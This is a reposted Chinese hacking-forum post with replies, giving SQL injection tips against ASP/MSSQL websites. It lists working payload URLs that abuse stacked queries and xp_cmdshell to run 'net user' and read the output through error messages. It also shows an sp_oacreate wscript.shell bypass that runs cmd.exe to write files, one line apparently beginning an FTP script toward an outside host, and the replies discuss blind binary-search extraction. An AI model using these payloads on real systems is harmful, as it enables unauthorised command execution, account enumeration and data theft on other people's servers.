[转载]注入技巧手记
文章作者:Alpha1.显示cmd执行的回显.
在注入是sa权限时,看不到命令的回显时件很痛苦的事情,在小竹兄的nbsi里也有一个尝试回显,可为什么要尝试了?呵呵
下面我说一种方法,绝对对可看到回显,不知道小竹兄用的是什么方法哦
建立表
语句:[url]http://www.xxxxx.com/down/list.asp?id=1;create[/url] table dirs(paths varchar(1000));--
返回:正常的信息!说明建表成功!继续!
语句:[url]http://www.xxxxx.com/down/list.asp?id=1;insert[/url] dirs exec master.dbo.xp_cmdshell 'net user' ;--
返回:正常信息。应该写入dirs数据正常
语句:[url]http://www.xxxxx.com/down/list.asp?id=1[/url] and 0<>(select top 1 paths from dirs);--
返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07
将 varchar 值 '***'转换为数据类型为 int 的列时发生语法错误。
^_^,这样我们就看到回显的结果了,当然,直接用nbsi暴表里的内容将更快速.
同理 ,其它的扩展也可以用这种方法得到内容哦,比如regread,(没有测试)
2. xp_dirtree写路径的问题
nbsi的目录列表工具不是很好用,有时候显示列不出来,实际上是出来了的哦,你直接暴表的数据(默认是NB_TreeList_Tmp)就看到内容了.
3.检测漏洞存在
nbsi的漏洞检测功能实在不敢恭维,对于写的像数字型的字符他都拒绝检测,就更不用说过滤了引号的类型了,所以还是建议手工检测,这样保证万无一失(:P)
4.删除xpsql70.dll和xp_cmdshell,and无法上传的问题解决
实际上很早以前czy大哥已经说过了,记得lzy好像也说过一个,不过和这个好像不一样
declare @s int
exec sp_oacreate "wscript.shell",@s out
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:\a.txt"
这个是在查询分析器里执行的,直接在地址栏里应该也是可以执行的,像这样
declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo aaa >c:\a.txt"
具体的没有在注入点测试
转载著名作者:Alpha谢谢 其实用“尝试”的原因很简单, 就是当IIS发生错误设置为发送文本给客户时,我们就没发看到暴库的内容。
呵呵 ,如果遇到上面的情况,你硬是看到回显 还有种办法,其中NBSI某些地方就用到这种方法,就是速度有点慢而已。 这种方法看上去相当于把内容暴出来了...
nbsi很少用...不怎么会
lanker的还有一种方法意思是? 就是象猜密码那样, 用二分法一个一个字去猜字段里的内容,如果内容比较多的话,速度可想而之了,有点不现实了,但如果用多线称工具会好的多。
页:
[1]